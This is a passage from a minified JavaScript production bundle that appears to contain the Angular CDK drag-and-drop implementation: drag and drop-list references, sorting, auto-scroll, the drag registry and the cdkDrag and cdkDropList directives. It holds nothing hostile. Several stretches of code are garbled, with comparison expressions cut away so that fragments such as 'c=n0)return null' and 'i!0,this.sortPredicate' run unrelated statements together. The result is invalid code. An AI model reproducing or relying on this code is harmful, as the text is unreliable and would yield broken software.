e=this._dropContainer?this._dropContainer.lockAxis:null;let{x:i,y:n}=this.constrainPosition?this.constrainPosition(a,this,this._initialClientRect,this._pickupPositionInElement):a;if("x"===this.lockAxis||"x"===e?n=this._pickupPositionOnPage.y:("y"===this.lockAxis||"y"===e)&&(i=this._pickupPositionOnPage.x),this._boundaryRect){const{x:r,y:c}=this._pickupPositionInElement,d=this._boundaryRect,{width:T,height:k}=this._getPreviewRect(),q=d.top+c,Y=d.bottom-(k-c);i=nW(i,d.left+r,d.right-(T-r)),n=nW(n,q,Y)}return{x:i,y:n}}_updatePointerDirectionDelta(a){const{x:e,y:i}=a,n=this._pointerDirectionDelta,r=this._pointerPositionAtLastDirectionChange,c=Math.abs(e-r.x),d=Math.abs(i-r.y);return c>this._config.pointerDirectionChangeThreshold&&(n.x=e>r.x?1:-1,r.x=e),d>this._config.pointerDirectionChangeThreshold&&(n.y=i>r.y?1:-1,r.y=i),n}_toggleNativeDragInteractions(){if(!this._rootElement||!this._handles)return;const a=this._handles.length>0||!this.isDragging();a!==this._nativeInteractionsEnabled&&(this._nativeInteractionsEnabled=a,W1(this._rootElement,a))}_removeRootElementListeners(a){a.removeEventListener("mousedown",this._pointerDown,H3),a.removeEventListener("touchstart",this._pointerDown,aW),a.removeEventListener("dragstart",this._nativeDragStart,H3)}_applyRootElementTransform(a,e){const i=U3(a,e),n=this._rootElement.style;null==this._initialTransform&&(this._initialTransform=n.transform&&"none"!=n.transform?n.transform:""),n.transform=B3(i,this._initialTransform)}_applyPreviewTransform(a,e){var i;const n=null!==(i=this._previewTemplate)&&void 0!==i&&i.template?void 0:this._initialTransform,r=U3(a,e);this._preview.style.transform=B3(r,n)}_getDragDistance(a){const e=this._pickupPositionOnPage;return e?{x:a.x-e.x,y:a.y-e.y}:{x:0,y:0}}_cleanupCachedDimensions(){this._boundaryRect=this._previewRect=void 0,this._parentPositions.clear()}_containInsideBoundaryOnResize(){let{x:a,y:e}=this._passiveTransform;if(0===a&&0===e||this.isDragging()||!this._boundaryElement)return;const i=this._rootElement.getBoundingClientRect(),n=this._boundaryElement.getBoundingClientRect();if(0===n.width&&0===n.height||0===i.width&&0===i.height)return;const r=n.left-i.left,c=i.right-n.right,d=n.top-i.top,T=i.bottom-n.bottom;n.width>i.width?(r>0&&(a+=r),c>0&&(a-=c)):a=0,n.height>i.height?(d>0&&(e+=d),T>0&&(e-=T)):e=0,(a!==this._passiveTransform.x||e!==this._passiveTransform.y)&&this.setFreeDragPosition({y:e,x:a})}_getDragStartDelay(a){const e=this.dragStartDelay;return"number"==typeof e?e:Jy(a)?e.touch:e?e.mouse:0}_updateOnScroll(a){const e=this._parentPositions.handleScroll(a);if(e){const i=Id(a);this._boundaryRect&&i!==this._boundaryElement&&i.contains(this._boundaryElement)&&Yy(this._boundaryRect,e.top,e.left),this._pickupPositionOnPage.x+=e.left,this._pickupPositionOnPage.y+=e.top,this._dropContainer||(this._activeTransform.x-=e.left,this._activeTransform.y-=e.top,this._applyRootElementTransform(this._activeTransform.x,this._activeTransform.y))}}_getViewportScrollPosition(){var a;return(null===(a=this._parentPositions.positions.get(this._document))||void 0===a?void 0:a.scrollPosition)||this._parentPositions.getViewportScrollPosition()}_getShadowRoot(){return void 0===this._cachedShadowRoot&&(this._cachedShadowRoot=_3(this._rootElement)),this._cachedShadowRoot}_getPreviewInsertionPoint(a,e){const i=this._previewContainer||"global";if("parent"===i)return a;if("global"===i){const n=this._document;return e||n.fullscreenElement||n.webkitFullscreenElement||n.mozFullScreenElement||n.msFullscreenElement||n.body}return Gr(i)}_getPreviewRect(){return(!this._previewRect||!this._previewRect.width&&!this._previewRect.height)&&(this._previewRect=this._preview?this._preview.getBoundingClientRect():this._initialClientRect),this._previewRect}_getTargetHandle(a){return this._handles.find(e=>a.target&&(a.target===e||e.contains(a.target)))}}function U3(t,a){return`translate3d(${Math.round(t)}px, ${Math.round(a)}px, 0)`}function nW(t,a,e){return Math.max(a,Math.min(e,t))}function Jy(t){return"t"===t.type[0]}function oW(t,a){const e=t.rootNodes;if(1===e.length&&e[0].nodeType===a.ELEMENT_NODE)return e[0];const i=a.createElement("div");return e.forEach(n=>i.appendChild(n)),i}function rW(t,a){t.style.width=`${a.width}px`,t.style.height=`${a.height}px`,t.style.transform=U3(a.left,a.top)}function Qs(t,a,e){const i=Zy(a,t.length-1),n=Zy(e,t.length-1);if(i===n)return;const r=t[i],c=n0)return null;const d="horizontal"===this.orientation,T=r.findIndex(Ne=>Ne.drag===a),k=r[c],Y=k.clientRect,te=T>c?1:-1,pe=this._getItemOffsetPx(r[T].clientRect,Y,te),Re=this._getSiblingOffsetPx(T,r,te),Fe=r.slice();return Qs(r,T,c),r.forEach((Ne,et)=>{if(Fe[et]===Ne)return;const ut=Ne.drag===a,Ze=ut?pe:Re,yt=ut?a.getPlaceholderElement():Ne.drag.getRootElement();Ne.offset+=Ze,d?(yt.style.transform=B3(`translate3d(${Math.round(Ne.offset)}px, 0, 0)`,Ne.initialTransform),Yy(Ne.clientRect,0,Ze)):(yt.style.transform=B3(`translate3d(0, ${Math.round(Ne.offset)}px, 0)`,Ne.initialTransform),Yy(Ne.clientRect,Ze,0))}),this._previousSwap.overlaps=Vw(Y,e,i),this._previousSwap.drag=k.drag,this._previousSwap.delta=d?n.x:n.y,{previousIndex:T,currentIndex:c}}enter(a,e,i,n){const r=null==n||n<0?this._getItemIndexFromPointerPosition(a,e,i):n,c=this._activeDraggables,d=c.indexOf(a),T=a.getPlaceholderElement();let k=c[r];if(k===a&&(k=c[r+1]),!k&&(null==r||-1===r||r-1&&c.splice(d,1),k&&!this._dragDropRegistry.isDragging(k)){const q=k.getRootElement();q.parentElement.insertBefore(T,q),c.splice(r,0,a)}else Gr(this._element).appendChild(T),c.push(a);T.style.transform="",this._cacheItemPositions()}withItems(a){this._activeDraggables=a.slice(),this._cacheItemPositions()}withSortPredicate(a){this._sortPredicate=a}reset(){this._activeDraggables.forEach(a=>{var e;const i=a.getRootElement();if(i){const n=null===(e=this._itemPositions.find(r=>r.drag===a))||void 0===e?void 0:e.initialTransform;i.style.transform=n||""}}),this._itemPositions=[],this._activeDraggables=[],this._previousSwap.drag=null,this._previousSwap.delta=0,this._previousSwap.overlaps=!1}getActiveItemsSnapshot(){return this._activeDraggables}getItemIndex(a){return("horizontal"===this.orientation&&"rtl"===this.direction?this._itemPositions.slice().reverse():this._itemPositions).findIndex(i=>i.drag===a)}updateOnScroll(a,e){this._itemPositions.forEach(({clientRect:i})=>{Yy(i,a,e)}),this._itemPositions.forEach(({drag:i})=>{this._dragDropRegistry.isDragging(i)&&i._sortFromLastPointerPosition()})}_cacheItemPositions(){const a="horizontal"===this.orientation;this._itemPositions=this._activeDraggables.map(e=>{const i=e.getVisibleElement();return{drag:e,offset:0,initialTransform:i.style.transform||"",clientRect:Fw(i)}}).sort((e,i)=>a?e.clientRect.left-i.clientRect.left:e.clientRect.top-i.clientRect.top)}_getItemOffsetPx(a,e,i){const n="horizontal"===this.orientation;let r=n?e.left-a.left:e.top-a.top;return-1===i&&(r+=n?e.width-a.width:e.height-a.height),r}_getSiblingOffsetPx(a,e,i){const n="horizontal"===this.orientation,r=e[a].clientRect,c=e[a+-1*i];let d=r[n?"width":"height"]*i;if(c){const T=n?"left":"top",k=n?"right":"bottom";-1===i?d-=c.clientRect[T]-r[k]:d+=r[T]-c.clientRect[k]}return d}_shouldEnterAsFirstChild(a,e){if(!this._activeDraggables.length)return!1;const i=this._itemPositions,n="horizontal"===this.orientation;if(i[0].drag!==this._activeDraggables[0]){const c=i[i.length-1].clientRect;return n?a>=c.right:e>=c.bottom}{const c=i[0].clientRect;return n?a<=c.left:e<=c.top}}_getItemIndexFromPointerPosition(a,e,i,n){const r="horizontal"===this.orientation,c=this._itemPositions.findIndex(({drag:d,clientRect:T})=>{if(d===a)return!1;if(n){const k=r?n.x:n.y;if(d===this._previousSwap.drag&&this._previousSwap.overlaps&&k===this._previousSwap.delta)return!1}return r?e>=Math.floor(T.left)&&e=Math.floor(T.top)&&i!0,this.sortPredicate=()=>!0,this.beforeStarted=new J,this.entered=new J,this.exited=new J,this.dropped=new J,this.sorted=new J,this._isDragging=!1,this._draggables=[],this._siblings=[],this._activeSiblings=new Set,this._viewportScrollSubscription=I.EMPTY,this._verticalScrollDirection=0,this._horizontalScrollDirection=0,this._stopScrollTimers=new J,this._cachedShadowRoot=null,this._startScrollInterval=()=>{this._stopScrolling(),$z(0,Az).pipe(ea(this._stopScrollTimers)).subscribe(()=>{const c=this._scrollNode,d=this.autoScrollStep;1===this._verticalScrollDirection?c.scrollBy(0,-d):2===this._verticalScrollDirection&&c.scrollBy(0,d),1===this._horizontalScrollDirection?c.scrollBy(-d,0):2===this._horizontalScrollDirection&&c.scrollBy(d,0)})},this.element=Gr(a),this._document=i,this.withScrollableParents([this.element]),e.registerDropContainer(this),this._parentPositions=new Jz(i),this._sortStrategy=new fpe(this.element,e),this._sortStrategy.withSortPredicate((c,d)=>this.sortPredicate(c,d,this))}dispose(){this._stopScrolling(),this._stopScrollTimers.complete(),this._viewportScrollSubscription.unsubscribe(),this.beforeStarted.complete(),this.entered.complete(),this.exited.complete(),this.dropped.complete(),this.sorted.complete(),this._activeSiblings.clear(),this._scrollNode=null,this._parentPositions.clear(),this._dragDropRegistry.removeDropContainer(this)}isDragging(){return this._isDragging}start(){this._draggingStarted(),this._notifyReceivingSiblings()}enter(a,e,i,n){this._draggingStarted(),null==n&&this.sortingDisabled&&(n=this._draggables.indexOf(a)),this._sortStrategy.enter(a,e,i,n),this._cacheParentPositions(),this._notifyReceivingSiblings(),this.entered.next({item:a,container:this,currentIndex:this.getItemIndex(a)})}exit(a){this._reset(),this.exited.next({item:a,container:this})}drop(a,e,i,n,r,c,d,T={}){this._reset(),this.dropped.next({item:a,currentIndex:e,previousIndex:i,container:this,previousContainer:n,isPointerOverContainer:r,distance:c,dropPoint:d,event:T})}withItems(a){const e=this._draggables;return this._draggables=a,a.forEach(i=>i._withDropContainer(this)),this.isDragging()&&(e.filter(n=>n.isDragging()).every(n=>-1===a.indexOf(n))?this._reset():this._sortStrategy.withItems(this._draggables)),this}withDirection(a){return this._sortStrategy.direction=a,this}connectedTo(a){return this._siblings=a.slice(),this}withOrientation(a){return this._sortStrategy.orientation=a,this}withScrollableParents(a){const e=Gr(this.element);return this._scrollableElements=-1===a.indexOf(e)?[e,...a]:a.slice(),this}getScrollableParents(){return this._scrollableElements}getItemIndex(a){return this._isDragging?this._sortStrategy.getItemIndex(a):this._draggables.indexOf(a)}isReceiving(){return this._activeSiblings.size>0}_sortItem(a,e,i,n){if(this.sortingDisabled||!this._clientRect||!Yz(this._clientRect,.05,e,i))return;const r=this._sortStrategy.sort(a,e,i,n);r&&this.sorted.next({previousIndex:r.previousIndex,currentIndex:r.currentIndex,container:this,item:a})}_startScrollingIfNecessary(a,e){if(this.autoScrollDisabled)return;let i,n=0,r=0;if(this._parentPositions.positions.forEach((c,d)=>{d===this._document||!c.clientRect||i||Yz(c.clientRect,.05,a,e)&&([n,r]=function _pe(t,a,e,i){const n=lW(a,i),r=dW(a,e);let c=0,d=0;if(n){const T=t.scrollTop;1===n?T>0&&(c=1):t.scrollHeight-T>t.clientHeight&&(c=2)}if(r){const T=t.scrollLeft;1===r?T>0&&(d=1):t.scrollWidth-T>t.clientWidth&&(d=2)}return[c,d]}(d,c.clientRect,a,e),(n||r)&&(i=d))}),!n&&!r){const{width:c,height:d}=this._viewportRuler.getViewportSize(),T={width:c,height:d,top:0,right:c,bottom:d,left:0};n=lW(T,e),r=dW(T,a),i=window}i&&(n!==this._verticalScrollDirection||r!==this._horizontalScrollDirection||i!==this._scrollNode)&&(this._verticalScrollDirection=n,this._horizontalScrollDirection=r,this._scrollNode=i,(n||r)&&i?this._ngZone.runOutsideAngular(this._startScrollInterval):this._stopScrolling())}_stopScrolling(){this._stopScrollTimers.next()}_draggingStarted(){const a=Gr(this.element).style;this.beforeStarted.next(),this._isDragging=!0,this._initialScrollSnap=a.msScrollSnapType||a.scrollSnapType||"",a.scrollSnapType=a.msScrollSnapType="none",this._sortStrategy.start(this._draggables),this._cacheParentPositions(),this._viewportScrollSubscription.unsubscribe(),this._listenToScrollEvents()}_cacheParentPositions(){const a=Gr(this.element);this._parentPositions.cache(this._scrollableElements),this._clientRect=this._parentPositions.positions.get(a).clientRect}_reset(){this._isDragging=!1;const a=Gr(this.element).style;a.scrollSnapType=a.msScrollSnapType=this._initialScrollSnap,this._siblings.forEach(e=>e._stopReceiving(this)),this._sortStrategy.reset(),this._stopScrolling(),this._viewportScrollSubscription.unsubscribe(),this._parentPositions.clear()}_isOverContainer(a,e){return null!=this._clientRect&&Vw(this._clientRect,a,e)}_getSiblingContainerFromPosition(a,e,i){return this._siblings.find(n=>n._canReceive(a,e,i))}_canReceive(a,e,i){if(!this._clientRect||!Vw(this._clientRect,e,i)||!this.enterPredicate(a,this))return!1;const n=this._getShadowRoot().elementFromPoint(e,i);if(!n)return!1;const r=Gr(this.element);return n===r||r.contains(n)}_startReceiving(a,e){const i=this._activeSiblings;!i.has(a)&&e.every(n=>this.enterPredicate(n,this)||this._draggables.indexOf(n)>-1)&&(i.add(a),this._cacheParentPositions(),this._listenToScrollEvents())}_stopReceiving(a){this._activeSiblings.delete(a),this._viewportScrollSubscription.unsubscribe()}_listenToScrollEvents(){this._viewportScrollSubscription=this._dragDropRegistry.scrolled(this._getShadowRoot()).subscribe(a=>{if(this.isDragging()){const e=this._parentPositions.handleScroll(a);e&&this._sortStrategy.updateOnScroll(e.top,e.left)}else this.isReceiving()&&this._cacheParentPositions()})}_getShadowRoot(){if(!this._cachedShadowRoot){const a=_3(Gr(this.element));this._cachedShadowRoot=a||this._document}return this._cachedShadowRoot}_notifyReceivingSiblings(){const a=this._sortStrategy.getActiveItemsSnapshot().filter(e=>e.isDragging());this._siblings.forEach(e=>e._startReceiving(this,a))}}function lW(t,a){const{top:e,bottom:i,height:n}=t,r=.05*n;return a>=e-r&&a<=e+r?1:a>=i-r&&a<=i+r?2:0}function dW(t,a){const{left:e,right:i,width:n}=t,r=.05*n;return a>=e-r&&a<=e+r?1:a>=i-r&&a<=i+r?2:0}const q3=ym({passive:!1,capture:!0});let gpe=(()=>{class t{constructor(e,i){this._ngZone=e,this._dropInstances=new Set,this._dragInstances=new Set,this._activeDragInstances=[],this._globalListeners=new Map,this._draggingPredicate=n=>n.isDragging(),this.pointerMove=new J,this.pointerUp=new J,this.scroll=new J,this._preventDefaultWhileDragging=n=>{this._activeDragInstances.length>0&&n.preventDefault()},this._persistentTouchmoveListener=n=>{this._activeDragInstances.length>0&&(this._activeDragInstances.some(this._draggingPredicate)&&n.preventDefault(),this.pointerMove.next(n))},this._document=i}registerDropContainer(e){this._dropInstances.has(e)||this._dropInstances.add(e)}registerDragItem(e){this._dragInstances.add(e),1===this._dragInstances.size&&this._ngZone.runOutsideAngular(()=>{this._document.addEventListener("touchmove",this._persistentTouchmoveListener,q3)})}removeDropContainer(e){this._dropInstances.delete(e)}removeDragItem(e){this._dragInstances.delete(e),this.stopDragging(e),0===this._dragInstances.size&&this._document.removeEventListener("touchmove",this._persistentTouchmoveListener,q3)}startDragging(e,i){if(!(this._activeDragInstances.indexOf(e)>-1)&&(this._activeDragInstances.push(e),1===this._activeDragInstances.length)){const n=i.type.startsWith("touch");this._globalListeners.set(n?"touchend":"mouseup",{handler:r=>this.pointerUp.next(r),options:!0}).set("scroll",{handler:r=>this.scroll.next(r),options:!0}).set("selectstart",{handler:this._preventDefaultWhileDragging,options:q3}),n||this._globalListeners.set("mousemove",{handler:r=>this.pointerMove.next(r),options:q3}),this._ngZone.runOutsideAngular(()=>{this._globalListeners.forEach((r,c)=>{this._document.addEventListener(c,r.handler,r.options)})})}}stopDragging(e){const i=this._activeDragInstances.indexOf(e);i>-1&&(this._activeDragInstances.splice(i,1),0===this._activeDragInstances.length&&this._clearGlobalListeners())}isDragging(e){return this._activeDragInstances.indexOf(e)>-1}scrolled(e){const i=[this.scroll];return e&&e!==this._document&&i.push(new G(n=>this._ngZone.runOutsideAngular(()=>{const c=d=>{this._activeDragInstances.length&&n.next(d)};return e.addEventListener("scroll",c,!0),()=>{e.removeEventListener("scroll",c,!0)}}))),ra(...i)}ngOnDestroy(){this._dragInstances.forEach(e=>this.removeDragItem(e)),this._dropInstances.forEach(e=>this.removeDropContainer(e)),this._clearGlobalListeners(),this.pointerMove.complete(),this.pointerUp.complete()}_clearGlobalListeners(){this._globalListeners.forEach((e,i)=>{this._document.removeEventListener(i,e.handler,e.options)}),this._globalListeners.clear()}}return t.\u0275fac=function(e){return new(e||t)(At(qi),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const Cpe={dragStartThreshold:5,pointerDirectionChangeThreshold:5};let Hw=(()=>{class t{constructor(e,i,n,r){this._document=e,this._ngZone=i,this._viewportRuler=n,this._dragDropRegistry=r}createDrag(e,i=Cpe){return new hpe(e,i,this._document,this._ngZone,this._viewportRuler,this._dragDropRegistry)}createDropList(e){return new ppe(e,this._dragDropRegistry,this._document,this._ngZone,this._viewportRuler)}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(qi),At(bm),At(gpe))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const mW=new ni("CDK_DRAG_PARENT"),uW=new ni("CdkDropListGroup"),hW=new ni("CDK_DRAG_CONFIG");let ype=0;const fW=new ni("CdkDropList");let Sd=(()=>{class t{constructor(e,i,n,r,c,d,T){this.element=e,this._changeDetectorRef=n,this._scrollDispatcher=r,this._dir=c,this._group=d,this._destroyed=new J,this.connectedTo=[],this.id="cdk-drop-list-"+ype++,this.enterPredicate=()=>!0,this.sortPredicate=()=>!0,this.dropped=new Tt,this.entered=new Tt,this.exited=new Tt,this.sorted=new Tt,this._unsortedItems=new Set,this._dropListRef=i.createDropList(e),this._dropListRef.data=this,T&&this._assignDefaults(T),this._dropListRef.enterPredicate=(k,q)=>this.enterPredicate(k.data,q.data),this._dropListRef.sortPredicate=(k,q,Y)=>this.sortPredicate(k,q.data,Y.data),this._setupInputSyncSubscription(this._dropListRef),this._handleEvents(this._dropListRef),t._dropLists.push(this),d&&d._items.add(this)}get disabled(){return this._disabled||!!this._group&&this._group.disabled}set disabled(e){this._dropListRef.disabled=this._disabled=wi(e)}addItem(e){this._unsortedItems.add(e),this._dropListRef.isDragging()&&this._syncItemsWithRef()}removeItem(e){this._unsortedItems.delete(e),this._dropListRef.isDragging()&&this._syncItemsWithRef()}getSortedItems(){return Array.from(this._unsortedItems).sort((e,i)=>e._dragRef.getVisibleElement().compareDocumentPosition(i._dragRef.getVisibleElement())&Node.DOCUMENT_POSITION_FOLLOWING?-1:1)}ngOnDestroy(){const e=t._dropLists.indexOf(this);e>-1&&t._dropLists.splice(e,1),this._group&&this._group._items.delete(this),this._unsortedItems.clear(),this._dropListRef.dispose(),this._destroyed.next(),this._destroyed.complete()}_setupInputSyncSubscription(e){this._dir&&this._dir.change.pipe(Ro(this._dir.value),ea(this._destroyed)).subscribe(i=>e.withDirection(i)),e.beforeStarted.subscribe(()=>{const i=Oy(this.connectedTo).map(n=>"string"==typeof n?t._dropLists.find(c=>c.id===n):n);if(this._group&&this._group._items.forEach(n=>{-1===i.indexOf(n)&&i.push(n)}),!this._scrollableParentsResolved){const n=this._scrollDispatcher.getAncestorScrollContainers(this.element).map(r=>r.getElementRef().nativeElement);this._dropListRef.withScrollableParents(n),this._scrollableParentsResolved=!0}e.disabled=this.disabled,e.lockAxis=this.lockAxis,e.sortingDisabled=wi(this.sortingDisabled),e.autoScrollDisabled=wi(this.autoScrollDisabled),e.autoScrollStep=Uo(this.autoScrollStep,2),e.connectedTo(i.filter(n=>n&&n!==this).map(n=>n._dropListRef)).withOrientation(this.orientation)})}_handleEvents(e){e.beforeStarted.subscribe(()=>{this._syncItemsWithRef(),this._changeDetectorRef.markForCheck()}),e.entered.subscribe(i=>{this.entered.emit({container:this,item:i.item.data,currentIndex:i.currentIndex})}),e.exited.subscribe(i=>{this.exited.emit({container:this,item:i.item.data}),this._changeDetectorRef.markForCheck()}),e.sorted.subscribe(i=>{this.sorted.emit({previousIndex:i.previousIndex,currentIndex:i.currentIndex,container:this,item:i.item.data})}),e.dropped.subscribe(i=>{this.dropped.emit({previousIndex:i.previousIndex,currentIndex:i.currentIndex,previousContainer:i.previousContainer.data,container:i.container.data,item:i.item.data,isPointerOverContainer:i.isPointerOverContainer,distance:i.distance,dropPoint:i.dropPoint,event:i.event}),this._changeDetectorRef.markForCheck()})}_assignDefaults(e){const{lockAxis:i,draggingDisabled:n,sortingDisabled:r,listAutoScrollDisabled:c,listOrientation:d}=e;this.disabled=null!=n&&n,this.sortingDisabled=null!=r&&r,this.autoScrollDisabled=null!=c&&c,this.orientation=d||"vertical",i&&(this.lockAxis=i)}_syncItemsWithRef(){this._dropListRef.withItems(this.getSortedItems().map(e=>e._dragRef))}}return t._dropLists=[],t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Hw),Ee(Ma),Ee(By),Ee(Cr,8),Ee(uW,12),Ee(hW,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkDropList",""],["cdk-drop-list"]],hostAttrs:[1,"cdk-drop-list"],hostVars:7,hostBindings:function(e,i){2&e&&(Rt("id",i.id),Ct("cdk-drop-list-disabled",i.disabled)("cdk-drop-list-dragging",i._dropListRef.isDragging())("cdk-drop-list-receiving",i._dropListRef.isReceiving()))},inputs:{connectedTo:["cdkDropListConnectedTo","connectedTo"],data:["cdkDropListData","data"],orientation:["cdkDropListOrientation","orientation"],id:"id",lockAxis:["cdkDropListLockAxis","lockAxis"],disabled:["cdkDropListDisabled","disabled"],sortingDisabled:["cdkDropListSortingDisabled","sortingDisabled"],enterPredicate:["cdkDropListEnterPredicate","enterPredicate"],sortPredicate:["cdkDropListSortPredicate","sortPredicate"],autoScrollDisabled:["cdkDropListAutoScrollDisabled","autoScrollDisabled"],autoScrollStep:["cdkDropListAutoScrollStep","autoScrollStep"]},outputs:{dropped:"cdkDropListDropped",entered:"cdkDropListEntered",exited:"cdkDropListExited",sorted:"cdkDropListSorted"},exportAs:["cdkDropList"],features:[ki([{provide:uW,useValue:void 0},{provide:fW,useExisting:t}])]}),t})();const pW=new ni("CdkDragHandle"),bpe=new ni("CdkDragPlaceholder"),Mpe=new ni("CdkDragPreview");let kd=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te){this.element=e,this.dropContainer=i,this._ngZone=r,this._viewContainerRef=c,this._dir=T,this._changeDetectorRef=q,this._selfHandle=Y,this._parentDrag=te,this._destroyed=new J,this.started=new Tt,this.released=new Tt,this.ended=new Tt,this.entered=new Tt,this.exited=new Tt,this.dropped=new Tt,this.moved=new G(pe=>{const Re=this._dragRef.moved.pipe(Xe(Fe=>({source:this,pointerPosition:Fe.pointerPosition,event:Fe.event,delta:Fe.delta,distance:Fe.distance}))).subscribe(pe);return()=>{Re.unsubscribe()}}),this._dragRef=k.createDrag(e,{dragStartThreshold:d&&null!=d.dragStartThreshold?d.dragStartThreshold:5,pointerDirectionChangeThreshold:d&&null!=d.pointerDirectionChangeThreshold?d.pointerDirectionChangeThreshold:5,zIndex:null==d?void 0:d.zIndex}),this._dragRef.data=this,t._dragInstances.push(this),d&&this._assignDefaults(d),i&&(this._dragRef._withDropContainer(i._dropListRef),i.addItem(this)),this._syncInputs(this._dragRef),this._handleEvents(this._dragRef)}get disabled(){return this._disabled||this.dropContainer&&this.dropContainer.disabled}set disabled(e){this._disabled=wi(e),this._dragRef.disabled=this._disabled}getPlaceholderElement(){return this._dragRef.getPlaceholderElement()}getRootElement(){return this._dragRef.getRootElement()}reset(){this._dragRef.reset()}getFreeDragPosition(){return this._dragRef.getFreeDragPosition()}setFreeDragPosition(e){this._dragRef.setFreeDragPosition(e)}ngAfterViewInit(){this._ngZone.runOutsideAngular(()=>{this._ngZone.onStable.pipe(Cn(1),ea(this._destroyed)).subscribe(()=>{this._updateRootElement(),this._setupHandlesListener(),this.freeDragPosition&&this._dragRef.setFreeDragPosition(this.freeDragPosition)})})}ngOnChanges(e){const i=e.rootElementSelector,n=e.freeDragPosition;i&&!i.firstChange&&this._updateRootElement(),n&&!n.firstChange&&this.freeDragPosition&&this._dragRef.setFreeDragPosition(this.freeDragPosition)}ngOnDestroy(){this.dropContainer&&this.dropContainer.removeItem(this);const e=t._dragInstances.indexOf(this);e>-1&&t._dragInstances.splice(e,1),this._ngZone.runOutsideAngular(()=>{this._destroyed.next(),this._destroyed.complete(),this._dragRef.dispose()})}_updateRootElement(){var e;const i=this.element.nativeElement;let n=i;this.rootElementSelector&&(n=void 0!==i.closest?i.closest(this.rootElementSelector):null===(e=i.parentElement)||void 0===e?void 0:e.closest(this.rootElementSelector)),this._dragRef.withRootElement(n||i)}_getBoundaryElement(){const e=this.boundaryElement;return e?"string"==typeof e?this.element.nativeElement.closest(e):Gr(e):null}_syncInputs(e){e.beforeStarted.subscribe(()=>{if(!e.isDragging()){const i=this._dir,n=this.dragStartDelay,r=this._placeholderTemplate?{template:this._placeholderTemplate.templateRef,context:this._placeholderTemplate.data,viewContainer:this._viewContainerRef}:null,c=this._previewTemplate?{template:this._previewTemplate.templateRef,context:this._previewTemplate.data,matchSize:this._previewTemplate.matchSize,viewContainer:this._viewContainerRef}:null;e.disabled=this.disabled,e.lockAxis=this.lockAxis,e.dragStartDelay="object"==typeof n&&n?n:Uo(n),e.constrainPosition=this.constrainPosition,e.previewClass=this.previewClass,e.withBoundaryElement(this._getBoundaryElement()).withPlaceholderTemplate(r).withPreviewTemplate(c).withPreviewContainer(this.previewContainer||"global"),i&&e.withDirection(i.value)}}),e.beforeStarted.pipe(Cn(1)).subscribe(()=>{var i;if(this._parentDrag)return void e.withParent(this._parentDrag._dragRef);let n=this.element.nativeElement.parentElement;for(;n;){if(n.classList.contains("cdk-drag")){e.withParent((null===(i=t._dragInstances.find(r=>r.element.nativeElement===n))||void 0===i?void 0:i._dragRef)||null);break}n=n.parentElement}})}_handleEvents(e){e.started.subscribe(i=>{this.started.emit({source:this,event:i.event}),this._changeDetectorRef.markForCheck()}),e.released.subscribe(i=>{this.released.emit({source:this,event:i.event})}),e.ended.subscribe(i=>{this.ended.emit({source:this,distance:i.distance,dropPoint:i.dropPoint,event:i.event}),this._changeDetectorRef.markForCheck()}),e.entered.subscribe(i=>{this.entered.emit({container:i.container.data,item:this,currentIndex:i.currentIndex})}),e.exited.subscribe(i=>{this.exited.emit({container:i.container.data,item:this})}),e.dropped.subscribe(i=>{this.dropped.emit({previousIndex:i.previousIndex,currentIndex:i.currentIndex,previousContainer:i.previousContainer.data,container:i.container.data,isPointerOverContainer:i.isPointerOverContainer,item:this,distance:i.distance,dropPoint:i.dropPoint,event:i.event})})}_assignDefaults(e){const{lockAxis:i,dragStartDelay:n,constrainPosition:r,previewClass:c,boundaryElement:d,draggingDisabled:T,rootElementSelector:k,previewContainer:q}=e;this.disabled=null!=T&&T,this.dragStartDelay=n||0,i&&(this.lockAxis=i),r&&(this.constrainPosition=r),c&&(this.previewClass=c),d&&(this.boundaryElement=d),k&&(this.rootElementSelector=k),q&&(this.previewContainer=q)}_setupHandlesListener(){this._handles.changes.pipe(Ro(this._handles),qr(e=>{const i=e.filter(n=>n._parentDrag===this).map(n=>n.element);this._selfHandle&&this.rootElementSelector&&i.push(this.element),this._dragRef.withHandles(i)}),Ur(e=>ra(...e.map(i=>i._stateChanges.pipe(Ro(i))))),ea(this._destroyed)).subscribe(e=>{const i=this._dragRef,n=e.element.nativeElement;e.disabled?i.disableHandle(n):i.enableHandle(n)})}}return t._dragInstances=[],t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(fW,12),Ee(ga),Ee(qi),Ee(fo),Ee(hW,8),Ee(Cr,8),Ee(Hw),Ee(Ma),Ee(pW,10),Ee(mW,12))},t.\u0275dir=Ot({type:t,selectors:[["","cdkDrag",""]],contentQueries:function(e,i,n){if(1&e&&(fa(n,Mpe,5),fa(n,bpe,5),fa(n,pW,5)),2&e){let r;Vt(r=Bt())&&(i._previewTemplate=r.first),Vt(r=Bt())&&(i._placeholderTemplate=r.first),Vt(r=Bt())&&(i._handles=r)}},hostAttrs:[1,"cdk-drag"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("cdk-drag-disabled",i.disabled)("cdk-drag-dragging",i._dragRef.isDragging())},inputs:{data:["cdkDragData","data"],lockAxis:["cdkDragLockAxis","lockAxis"],rootElementSelector:["cdkDragRootElement","rootElementSelector"],boundaryElement:["cdkDragBoundary","boundaryElement"],dragStartDelay:["cdkDragStartDelay","dragStartDelay"],freeDragPosition:["cdkDragFreeDragPosition","freeDragPosition"],disabled:["cdkDragDisabled","disabled"],constrainPosition:["cdkDragConstrainPosition","constrainPosition"],previewClass:["cdkDragPreviewClass","previewClass"],previewContainer:["cdkDragPreviewContainer","previewContainer"]},outputs:{started:"cdkDragStarted",released:"cdkDragReleased",ended:"cdkDragEnded",entered:"cdkDragEntered",exited:"cdkDragExited",dropped:"cdkDragDropped",moved:"cdkDragMoved"},exportAs:["cdkDrag"],features:[ki([{provide:mW,useExisting:t}]),sa]}),t})(),_W=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[Hw],imports:[uu]}),t})();const Ape=["*",[["mat-option"],["ng-container"]]],Tpe=["*","mat-option, ng-container"];function Epe(t,a){if(1&t&&it(0,"mat-pseudo-checkbox",4),2&t){const e=V();F("state",e.selected?"checked":"unchecked")("disabled",e.disabled)}}function 